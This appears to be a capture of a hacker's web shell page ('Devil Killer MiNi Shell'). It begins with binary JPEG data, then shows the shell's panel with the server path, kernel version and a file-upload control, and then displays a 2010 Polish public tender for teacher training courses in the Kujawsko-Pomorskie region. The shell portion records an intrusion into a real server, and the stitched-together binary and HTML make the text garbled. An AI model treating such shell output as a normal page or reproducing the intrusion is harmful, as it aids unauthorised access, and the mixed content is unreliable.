JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100331/72283-N-2010.html

<p class="kh_header"><b>Toruń: przygotowanie programów, organizację i realizację kursów doskonalenia zawodowego nauczycieli województwa kujawsko- pomorskiego w zakresie doradztwa zawodowego oraz innowacyjnego nauczania przedmiotów zawodowych realizowanych w ramach Projektu pt. Klucz do uczenia - program wsparcia kujawsko-pomorskich nauczycieli</b><br>
<b>Numer ogłoszenia: 72283 - 2010; data zamieszczenia: 31.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kujawsko-Pomorskie Centrum Edukacji Nauczycieli , Aleja Solidarności 3, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 62 277 47, faks 56 62 231 81.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kpcen-torun.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przygotowanie programów, organizację i realizację kursów doskonalenia zawodowego nauczycieli województwa kujawsko- pomorskiego w zakresie doradztwa zawodowego oraz innowacyjnego nauczania przedmiotów zawodowych realizowanych w ramach Projektu pt. Klucz do uczenia - program wsparcia kujawsko-pomorskich nauczycieli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest przygotowanie programów, zorganizowanie                                      i przeprowadzenie szkoleń w 2010r. i 2011r. dla 480 nauczycieli z województwa kujawsko - pomorskiego, w formie kursów doskonalących, z zakresu doradztwa zawodowego oraz innowacyjnego nauczania przedmiotów zawodowych. Szczegóły określa punkt III niniejszej specyfikacji.
2.	Przedmiot zamówienia obejmuje przeszkolenie w formie kursów wskazanej w pkt. III  liczby osób, zgodnie z opisanymi wymaganiami.
3.	Szkolenia mają być realizowane w wymiarze godzinowym (nie mniej niż 40 godzin dydaktycznych na każdy kurs).
4.	Wykonawca jest zobowiązany do organizacji szkoleń dla nauczycieli z całego województwa kujawsko-pomorskiego, uwzględniając obszary wiejskie. Wykonawca, powinien stworzyć równe możliwości uczestnictwa w szkoleniach nauczycielom wskazanym w niniejszej specyfikacji jako ich adresaci, z uwzględnieniem zasady równości płci. Niedopuszczalne jest ograniczanie dostępności szkoleń,                                        tj. przeprowadzanie naboru uczestników wyłącznie w jednej szkole/placówce lub szkołach/placówkach wybranego rejonu województwa.
5.	Zamawiający nie przewiduje możliwości realizacji kursów jako szkoleń wszystkich członków rad pedagogicznych poszczególnych szkół/placówek. 
6.	Szkolenia powinny być przeprowadzone tylko na terenie województwa kujawsko - pomorskiego.
7.	Treści programów szkoleń muszą odpowiadać celom wyszczególnionym w pkt. III niniejszej specyfikacji.
8.	Wykonawca jest zobowiązany do przygotowania i nieodpłatnego udostępnienia materiałów dydaktycznych dla każdego uczestnika kursu, zapewnienia urządzeń/pomocy dydaktycznych niezbędnych do realizacji szkolenia oraz właściwych warunków lokalowych.
9.	Wykonawca musi posiadać potencjał kadrowy i doświadczenie gwarantujące właściwą realizację zadania.
10.	Wykonawca nie może pobierać żadnych opłat od uczestników szkolenia.
11.	Odbiór usługi zostanie udokumentowany SPRAWOZDANIEM z realizacji zadania przygotowanym przez Wykonawcę i przekazanym Zamawiającemu po zakończeniu zadania, jednak nie później niż do dnia 16 grudnia 2011r. SPRAWOZDANIE powinno zawierać: a) nazwę Wykonawcy realizującego zadanie; b) nazwę zadania; c) faktyczny termin realizacji zadania; d) liczbę uczestników szkolenia; e) wykaz kadry, która realizowała kursy (ze wskazaniem prowadzonych przez członków kadry modułów szkolenia), f) liczbę przeszkolonych grup; g) komplet materiałów szkoleniowych przekazanych uczestnikom szkolenia; h) opis zastosowanej procedury ewaluacji wewnętrznej szkolenia wraz z przykładowymi narzędziami tej ewaluacji, a także wyniki 
i wnioski z przeprowadzonej ewaluacji; i) uwagi i wnioski dotyczące przebiegu zajęć 
i efektów szkolenia oraz problemów organizacyjnych;. 

III. SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA 
III.1. Wymagania  dotyczące opracowania programów szkoleń

1.	Programy szkoleń w zakresie doradztwa zawodowego,  jak również  innowacyjnego nauczania przedmiotów zawodowych powinny być realizowane w łącznym wymiarze 420 godzin .
2.	Wskazane jest opracowanie kilku kursów dla w/w wymiaru godzin, przy czym minimalna liczba godzin przypadających na jedno szkolenie powinna wynosić 40 .
3.	Problematyka szkoleń :
a) w zakresie doradztwa zawodowego powinna pozwalać na podniesienie kompetencji zawodowych kadry pedagogicznej gimnazjów i szkół ponadgimnazjalnych  w realizacji zadań związanych z doradztwem zawodowym dla młodzieży poprzez: 
-	dostarczenie wiedzy umożliwiającej trafną diagnozę i orientację zawodową młodzieży
-	przygotowanie do udzielania profesjonalnego poradnictwa zawodowego
-	nabycie umiejętności konstruowania programów doradztwa zawodowego zgodnie 
z potrzebami szkoły,
-	realizację działań mających na celu optymalny rozwój edukacyjny i zawodowy ucznia,
-	nabycie umiejętności  doboru i wykorzystania wybranych aplikacji ICT do pracy doradcy zawodowego 
-	doskonalenie warsztatu pracy w zakresie prowadzenia zajęć psychoedukacyjnych dotyczących wdrażania młodzieży do aktualnych wymogów rynku pracy,
-	doskonalenie warsztatu pracy w zakresie nauczania przedsiębiorczości
b) dotyczących innowacyjnego nauczania przedmiotów zawodowych powinna pozwalać 
na podniesienie kompetencji zawodowych kadry pedagogicznej szkół ponadgimnazjalnych 
w zakresie:
-	tworzenia i modyfikowania programów nauczania przedmiotów zawodowych,                  z uwzględnieniem nauczania modułowego,
-	stosowania innowacyjnych metod nauczania- uczenia się ,
-	podnoszenia efektywności kształcenia poprzez stosowanie nowoczesnych metod oceniania pracy uczniów,
-	nabycie umiejętności metodycznych  w zakresie wykorzystania urządzeń ICT i aplikacji stosownych  do pracy nauczyciela teorii / praktyki przedmiotów zawodowych
-	wykorzystanie wyników pomiaru dydaktycznego do podniesienia efektywności                                                w nauczaniu  przedmiotów zawodowych.
4.	W rezultacie odbytych szkoleń uczestnicy nabędą następujące umiejętności przydatne 
w pracy zawodowej służące podnoszeniu efektywności kształcenia oraz doradztwa zawodowego :
a)	prowadzenie zajęć z zakresu przedsiębiorczości z wykorzystaniem innowacyjnych metod nauczania,
b)	prowadzenie zajęć warsztatowych dla młodzieży z zakresu rozpoznawania zasobów osobistych w określaniu własnych predyspozycji i ich wykorzystania w kształtowaniu drogi zawodowej,
c)	konstruowanie programów autorskich i dokonywanie ich ich modyfikacji                                      w przedmiotach zawodowych, z uwzględnieniem nauczania modułowego,
d)	konstruowanie narzędzi badawczych zgodnie z teorią pomiaru dydaktycznego,
e)	prowadzenie zajęć z zakresu określania preferencji i predyspozycji zawodowych młodzieży,
f)	analizowanie wyników testowania pisemnej części egzaminu potwierdzającego kwalifikacje zawodowe oraz  wyników zadań praktycznych, 
g)	planowanie i dokumentowanie pracy nauczyciela z zastosowaniem  nowoczesnych zasad oceniania,
h)	obsługa i zastosowanie wybranych aplikacji ICT w doradztwie zawodowym                                         i nauczaniu przedmiotów zawodowych
i)	efektywne wykorzystanie zasobów informacji oraz umiejętność doboru metod                          i środków ICT do przekazu multimedialnego,
j)	prowadzenie szkolnego ośrodka kariery zawodowej,
k)	stosowanie innowacyjnych metod nauczania-uczenia się w przedmiotach zawodowych.
5.	Każdy program szkolenia powinien być skonstruowany wg wzoru podanego 
w załączniku nr 4 niniejszej specyfikacji.
6.	W programach należy uwzględnić  prowadzenie superwizji zajęć.
III.2. Wymagania dotyczące organizacji i realizacji szkoleń
1.	W ramach kursów wymagane jest przeszkolenie:
a) z zakresu doradztwa zawodowego 250 nauczycieli gimnazjów i szkół ponadgimnazjalnych  ( 8 grup 20-osobowych i 6 grup 15-osobowych)
b) z zakresu innowacyjnego nauczania przedmiotów zawodowych  230 nauczycieli szkół ponadgimnazjalnych (10 grup 20-osobowych i 2 grupy 15-osobowe).
2. Zajęcia w grupach 15-osobowych powinny być realizowane w pracowniach komputerowych z dostępem do Internetu
3. Kursy powinny być prowadzone przez wykwalifikowaną kadrę w zakresie problematyki szkoleń, z doświadczeniem edukatorskim.
4. Zaleca się prowadzenie zajęć z zastosowaniem metod słownych i praktycznych (warsztaty).
5. Wykonawca zobowiązany jest  do monitorowania i ewaluowania zajęć wg regulaminu wewnętrznego własnej placówki. Narzędzia ewaluacji należy dołączyć do oferty.
6. Wykonawca zobowiązany jest przeprowadzić szkolenia w dostosowanych do tego celu salach wykładowych wyposażonych w standardowy sprzęt (laptop, projektor multimedialny, ekran, flipchart). W przypadku zajęć z zakresu technologii ICT zajęcia powinny być zrealizowane w pracowni komputerowej z 15 stanowiskami, z min.4Mbit Internetem, notebookiem, rzutnikiem i tablicą interaktywną.
7.Zajęcia powinny być realizowane w systemie weekendowym(piątek- po godz. 15.00 max.5 godz. dyd., sobota -  10 godz. dyd. z przerwą na obiad , niedziela - 5 godz. dyd.).
8.Wykonawca zobowiązany jest zapewnić posiłek uczestnikom szkolenia w formie cateringu.
III.3. Problematyka szkoleń
a) kursy z zakresu doradztwa zawodowego

Nazwa kursu/Liczba godzin szkolenia+ liczba godzin superwizji na grupę/	Liczba grup/Liczba osób w grupie/Terminy realizacji (2010-2011)
Przygotowanie młodzieży do wejścia na rynek pracy/60+20/3/20/od IX2010-do XI.2011
Szkolny ośrodek kariery krok po kroku/40/3/20/od X.2010-do X.2011
Technologie informacji w doradztwie i kształceniu zawodowym/60/6/15/od X.2010 - do IV.2011
Konstruowanie programów doradztwa zawodowego i sposoby ich realizacji na terenie szkoły/50/2/20/od X.2010-XII.2010
ŁĄCZNIE:	760 godzin+ 60 godzin superwizji np. w firmie symulacyjnej/12/250 osób		
b)kursy doskonalące w zakresie innowacyjnego nauczania przedmiotów  zawodowych
Nazwa kursu/Liczba godzin szkolenia+ liczba godzin superwizji /na grupę/	Liczba grup/Liczba osób w grupie/Termin realizacji (2010-2011)
Nauczanie modułowe przedmiotów zawodowych/40 + 10/3/20/od X.2010-do III.2011
Ocenianie kształtujące w szkole zawodowej/40 + 10/3/20/od IX.2010-do X.2011
Innowacyjne metody nauczania- uczenia się w szkole zawodowej/	40 + 10/3/20/od IX.2010-do XI.2011
Konstruowanie i modyfikacja programów nauczania przedmiotów zawodowych/	40/1/20/od IX.2010 do X.2010	-
Technologie multimedialne i sieciowe w nauczaniu przedmiotów zawodowych/50/2/15/od X.2010-II.2011
ŁĄCZNIE:	500 godzin+90 godz. superwizji/12/230 osób		

Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
Zamawiający nie przewiduje możliwości składania ofert wariantowych.
Zamawiający nie przewiduje zastosowania aukcji elektronicznej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 55.12.00.00-7, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
posiadają uprawnienia do prowadzenia działalności szkoleniowej;
Na potwierdzenie warunku udziału w postępowaniu Wykonawca składa:
-aktualne zaświadczenie o wpisie do rejestru prowadzonego przez kuratora oświaty właściwego ze względu na siedzibę placówki publicznej i niepublicznej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w celu potwierdzenia akredytacji)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
-posiadają niezbędną wiedzę i doświadczenie w zakresie odpowiadającym swoim rodzajem przedmiotowi zamówienia; tj. zrealizowali w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia (lub w okresie działania Zamawiającego, jeśli jest on krótszy niż trzy lata) co najmniej 2 usługi, odpowiadające swoim rodzajem przedmiotowi zamówienia, w których łącznie objęto przeszkoleniem co najmniej 100 osób, i których należyte wykonanie zostało potwierdzone przez odbiorcę danej usługi lub instytucję uprawnioną do jej kontroli;
Na potwierdzenie warunku udziału w postępowaniu Wykonawca składa:
-wykaz zrealizowanych przez Wykonawcę usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności był krótszy - w tym czasie, z wyszczególnieniem form realizacji zadania (np. szkolenia, konferencje itp.) jego tematyki, czasu trwania realizacji, liczby osób przeszkolonych oraz odbiorców usługi. Do wykazu należy załączyć dokumenty potwierdzające, że wykazane przez Wykonawcę usługi zostały wykonane należycie: posiadane referencje, opinie o realizacji usługi, raporty z ewaluacji zewnętrznych, a jeżeli brak oceny zewnętrznej raporty z ewaluacji wewnętrznych, wydanych przez odbiorcę usługi lub instytucję uprawnioną do jej kontroli.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
-dysponują potencjałem technicznym niezbędnym do realizacji zamówienia, tj. odpowiednio wyposażonymi salami szkoleniowymi oraz urządzeniami technicznymi umożliwiającymi realizację programu szkolenia;
Na potwierdzenie warunku udziału w postępowaniu Wykonawca składa:
-wykaz proponowanych sal wykładowych (adres) z podaniem podstawy dysponowania i niezbędnym do przeprowadzenia zajęć wyposażeniem.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
-dysponują osobami zdolnymi do wykonania zamówienia, tj. osobami, które posiadają kwalifikacje zawodowe (wykształcenie co najmniej wyższe magisterskie z przygotowaniem pedagogicznym oraz legitymują się przygotowaniem merytorycznym w zakresie odpowiadającym tematyce i treściom szkolenia), doświadczenie i wykształcenie umożliwiające realizację programu szkolenia i wyraziły zgodę na udział w realizacji programu szkolenia;
Na potwierdzenie warunku udziału w postępowaniu Wykonawca składa:
-wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, odpowiedzialnych za świadczenie usług szkoleniowych wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informację o podstawie dysponowania  tymi osobami,
-oświadczenia, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
-pisemne oświadczenia wszystkich proponowanych członków kadry o wyrażaniu przez nich zgody na prowadzenie zajęć w zakresie wskazanym przez Wykonawcę w Programie szkolenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
Na potwierdzenie warunku udziału w postępowaniu Wykonawca składa:
-oświadczenie o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - program szkolenia - 20</li>
<li>3 - kadra prowadząca szkolenie - 20</li>
<li>4 - warunki techniczne proponowanych miejsc szkoleń i usług gastronomicznych - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Postanowienia umowy Zamawiający zawarł we wzorze umowy stanowiącym załącznik nr  5 do SIWZ.
3.	Poza przypadkami określonymi w umowie zmiany umowy będą mogły nastąpić w wymienionych niżej okolicznościach:
a)	Zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą na potrzeby niniejszego warunku, rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
- o charakterze niezależnym od stron,
- którego strony nie mogły przewidzieć przed zawarciem umowy,
- którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności, której nie można przypisać drugiej stronie.
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar, inne klęski żywiołowe, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej.
b)	Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron,
c)	Powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
d)	Zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi bądź okolicznościami, które nie były możliwe do przewidzenia w momencie zawarcia umowy - zmianie mogą ulec termin realizacji umowy bądź terminy wynikające z harmonogramów płatności,
e)	Gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacja istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, w szczególności w zakresie zmiany przedmiotu zamówienia,  terminu realizacji, a także innych wymienionych w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
